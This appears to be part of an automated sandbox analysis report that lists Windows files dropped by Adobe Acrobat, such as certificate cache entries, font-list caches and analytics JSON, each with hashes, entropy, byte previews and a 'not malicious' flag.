                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):192
                                                        Entropy (8bit):2.7673182398396405
                                                        Encrypted:false
                                                        SSDEEP:3:kkFkl2/2kltfllXlE/HT8kx6/h/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKv/2kleT84KRNMa8RdWBwRd
                                                        MD5:D0A05D2AC49FAF5735532C14EABE6F74
                                                        SHA1:87B0E2D3853E382AE340F66EFD8210C1AFF9AB72
                                                        SHA-256:657FD2682C18F24DF01C84ABEDF61F519E19BCBBED3FD2E88A3606C6ED9B5E43
                                                        SHA-512:281A75392FA19CB98C038BDD594E08DA6877F9B60960499CB15BECBDCD9EFAAF6BCAA670FDB1EA405A9194CBD07ADE86C0C1641697275D7E8C9BCD5B168E661D
                                                        Malicious:false
                                                        Preview:p...... ...........3X..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):328
                                                        Entropy (8bit):3.241800306278291
                                                        Encrypted:false
                                                        SSDEEP:6:kKVFlL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HkDImsLNkPlE99SNxAhUe/3
                                                        MD5:254D9A23FB7E90EE36AC61A6355D116F
                                                        SHA1:43D11C91CBA980CA2437C8B33271B230AD9BA05A
                                                        SHA-256:E4952E8761BAA20D5601E3E7E38FA4C7BF3D29F3651FC6D9FE6E31A36DC36544
                                                        SHA-512:07CED673F00BED142B9E3A5F42EE0224EFEAEDE4FC394F930AB05A0D1FA994FBFDC56B22A32EC1680C76AE1B186DF92F0906F5C805E59412CE7A4E0A573C082D
                                                        Malicious:false
                                                        Preview:p...... ...........3X..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):1233
                                                        Entropy (8bit):5.233980037532449
                                                        Encrypted:false
                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7676

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):1233
                                                        Entropy (8bit):5.233980037532449
                                                        Encrypted:false
                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):1233
                                                        Entropy (8bit):5.233980037532449
                                                        Encrypted:false
                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):10880
                                                        Entropy (8bit):5.214360287289079
                                                        Encrypted:false
                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7676

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):10880
                                                        Entropy (8bit):5.214360287289079
                                                        Encrypted:false
                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):295
                                                        Entropy (8bit):5.347362202975625
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJM3g98kUwPeUkwRe9:YvXKXx+TQmyU1UTbdiGMbLUkee9
                                                        MD5:4238E8A42DA5B0ADC1D7B37037398745
                                                        SHA1:0A8470B04B15AB68F44B8551EED3D2985851B65C
                                                        SHA-256:D0732EBA5B2B8AFD97ABF895E523786F15DECE77C2C2882EB9F48FB636E5377C
                                                        SHA-512:279B83914AA36FC5AB5750B03C2F8ACFC0CF030A921E5D9710A70D7E5E6D4147FF3CB91F1FD926194AB45868AEDE8DD9CE40B003A565A8FBCC794B79690478F4
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):294
                                                        Entropy (8bit):5.288037307614041
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfBoTfXpnrPeUkwRe9:YvXKXx+TQmyU1UTbdiGWTfXcUkee9
                                                        MD5:DBBA38A1039588C49BA0C0B7C71CB0BB
                                                        SHA1:569E64A115785FF83218DD0B6A1EE7BFC55B753F
                                                        SHA-256:8E48D375D9CC2967050049106BA070800E4ABDC9E793A12263BC816ED6241662
                                                        SHA-512:4F72FEEF7EC22142C006261A0F0C87AC547E5B0D109BCD6B74E1A4F546BAA977200377CC939F752388378E55999DF4394D00D468A4A721DAFDF1C76367898754
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):294
                                                        Entropy (8bit):5.265989907613401
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfBD2G6UpnrPeUkwRe9:YvXKXx+TQmyU1UTbdiGR22cUkee9
                                                        MD5:EDD9C5821D74E6C32B34F131A0E988BE
                                                        SHA1:23C986CFBEE869D040E76D87FD9974D766D3D605
                                                        SHA-256:383D4C577AC8E20A973CF890B131019A351DBEA89FA266E507FE35F512FF79C0
                                                        SHA-512:861C5ADC9E53CD152F6166B77F35C816919514E0F6838ADECE17F6EA69FB52DE8F2E3E90473A0BC942D9FC8B7D48C6097F02E37A652125CC86049EB7B2E50F13
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):285
                                                        Entropy (8bit):5.321079467835037
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfPmwrPeUkwRe9:YvXKXx+TQmyU1UTbdiGH56Ukee9
                                                        MD5:2AC0F90ADFD1638DB4F47210313D191F
                                                        SHA1:003894A7F411D8099D8E73860ADCF4A213820739
                                                        SHA-256:2C535987232A8FD3B7959FA15632FC12B3135AB7C800C47CB47CF1C1E406EA7E
                                                        SHA-512:F180CD30CC9B7620CA438B73771156F7BB645C647BA7DDDECBBDC54B827C6F33DE1111EA0202D004EABBBD8621033DB81E1E2BB5B94F639B5D673A9A94A7197C
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1123
                                                        Entropy (8bit):5.682129451531302
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xx+TQmyCUXZpLgE9cQx8LennAvzBvkn0RCmK8czOCCSO:Yv0W7VwZhgy6SAFv5Ah8cv/O
                                                        MD5:79E92C71E4CA3744405A3CAC45F2A3C0
                                                        SHA1:55334D857BB845AAA51CF78F83AAF4DD025EF98D
                                                        SHA-256:A909B8BC66A8480557DF0A3BF6FD0BB2B16A22203B95948E34C64C5805851123
                                                        SHA-512:0A927E7E898CAEA75E8CDBB270AF9BBD38423562E52247E28B3CFFF7129ADE4FE70258BFD1383BCDCF01D38C8786F066D4E6EA31C9953A64C37F519201006F0C
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):289
                                                        Entropy (8bit):5.2635100765488865
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJf8dPeUkwRe9:YvXKXx+TQmyU1UTbdiGU8Ukee9
                                                        MD5:0916632BEF6698D597B2A38B7D281898
                                                        SHA1:8B6D0A84A2DE03CB5215F51EDEBD9053A18502BE
                                                        SHA-256:213148C6EB8499CB003D642C6EE5E011DD14B842FC06FDC7448EA4442638C163
                                                        SHA-512:A14E3CD5DB15F95D1F2A191A83ED19883439ADEFD1987A81DB4EF81F6DE2BB624E4D9B2D0DD61A583A17709B08BC0CA3CED2D5368DD8B03841758A7D7392CD5C
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):292
                                                        Entropy (8bit):5.267427821337732
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfQ1rPeUkwRe9:YvXKXx+TQmyU1UTbdiGY16Ukee9
                                                        MD5:594C610DC19581E821E82E5567630090
                                                        SHA1:3DEF9983E93BA328B0099D86D452CDFA2DB0FA02
                                                        SHA-256:7300C7E8111A7B63EDF9971FD5B5566670B3D056F9FF947778C4379AB9026076
                                                        SHA-512:8ACC02D27C129672567CA3FC62D63F233D05600A28E3D74F5590693091D3B63935221CF4C5C84BBF36D61A55F505227588C79BB0B2906FC5DF9D8CAE263BDF7E
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):289
                                                        Entropy (8bit):5.277056036125332
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfFldPeUkwRe9:YvXKXx+TQmyU1UTbdiGz8Ukee9
                                                        MD5:03E73265ACD92D7B483C0B2AF663ABBD
                                                        SHA1:8E310815C6FD7C0130079A07C9030A2E472D7169
                                                        SHA-256:ECFCBD788CE19C96C2C641621B34BB8498A92C503D671530EDB765DE94697EF1
                                                        SHA-512:CC26196307F6F9CB2788949B92539929BB6769BF542458F2492E146E64467F4D0C4BCD6E917BCE2A73DEE2E8CD2750662D025EC45824FCB168743F581C8BF31A
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):295
                                                        Entropy (8bit):5.290706162984914
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfzdPeUkwRe9:YvXKXx+TQmyU1UTbdiGb8Ukee9
                                                        MD5:F149647B2BAA0FC766B201B0CC7F618C
                                                        SHA1:BED20314A592DD8C2968DF8890B20B13350475FA
